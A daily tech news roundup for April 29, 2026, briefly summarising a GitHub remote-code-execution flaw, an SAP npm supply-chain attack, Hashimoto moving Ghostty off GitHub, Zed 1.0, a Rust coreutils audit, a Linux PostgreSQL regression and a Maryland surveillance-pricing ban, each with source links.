April 29, 2026 tech news: GitHub's Critical RCE Flaw; SAP Supply Chain Attack; Hashimoto Quits GitHub; Zed Editor Hits 1.0; Rust's Safety Limits Exposed; Linux 7.0 PostgreSQL Regression; Maryland Bans Surveillance Pricing.

GitHub’s Critical RCE Flaw

A critical vulnerability in GitHub’s internal git infrastructure allowed attackers to execute remote code on backend servers. On GitHub.com, this granted access to millions of public and private repositories on shared storage nodes; on GitHub Enterprise Server, it allowed full server compromise. The flaw was discovered using AI-augmented reverse engineering.

• https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

SAP Supply Chain Attack

Attackers compromised SAP-affiliated npm accounts to distribute credential-stealing malware via core SAP Cloud Application Programming Model packages. The payload harvests GitHub, AWS, Azure, and GCP tokens and poisons victim repositories with a malicious VS Code tasks.json to establish persistent CI/CD footholds.

• https://safedep.io/mini-shai-hulud-and-sap-compromise/

Hashimoto Quits GitHub

Hashicorp co-founder Mitchell Hashimoto is moving the Ghostty terminal emulator project off GitHub, citing frequent outages that make the platform ’no longer a place for serious work.’ After 18 years of daily use, Hashimoto claims the service has become too unreliable for professional software shipping.

• https://mitchellh.com/writing/ghostty-leaving-github
• https://theregister.com/2026/04/29/mitchell_hashimoto_ghostty_quitting_github/

Zed Editor Hits 1.0

The Zed editor has reached version 1.0, positioning itself as a high-performance, AI-native alternative to VS Code. By treating the editor like a video game and rendering via the GPU, Zed aims to provide a more responsive collaborative coding environment for humans and AI agents.

• https://zed.dev/blog/zed-1.0

Rust’s Safety Limits Exposed

An audit of the Rust-based GNU coreutils reimplementation (uutils) highlights that language safety does not equal system security. The findings show that critical vulnerabilities, including local root code execution in chroot, still occur when developers rely on ergonomic but unsafe filesystem APIs.

• https://corrode.dev/blog/bugs-rust-wont-catch/

Linux 7.0 PostgreSQL Regression

A kernel change in Linux 7.0 halved PostgreSQL throughput on high-vCPU machines. The issue stems from the scheduler preempting processes while they hold critical spinlocks during memory page faults; the regression can be mitigated by enabling huge pages to reduce fault frequency.

• https://read.thecoder.cafe/p/linux-broke-postgresql

Maryland Bans Surveillance Pricing

Maryland has become the first US state to ban ‘surveillance pricing’ in grocery stores, prohibiting retailers from using personal data (location, search history, demographics) to set higher prices for individual shoppers. Critics argue the law contains loopholes regarding loyalty programs and lacks strong enforcement.

• https://www.theguardian.com/technology/2026/apr/29/maryland-grocery-stores-ban-surveillance-pricing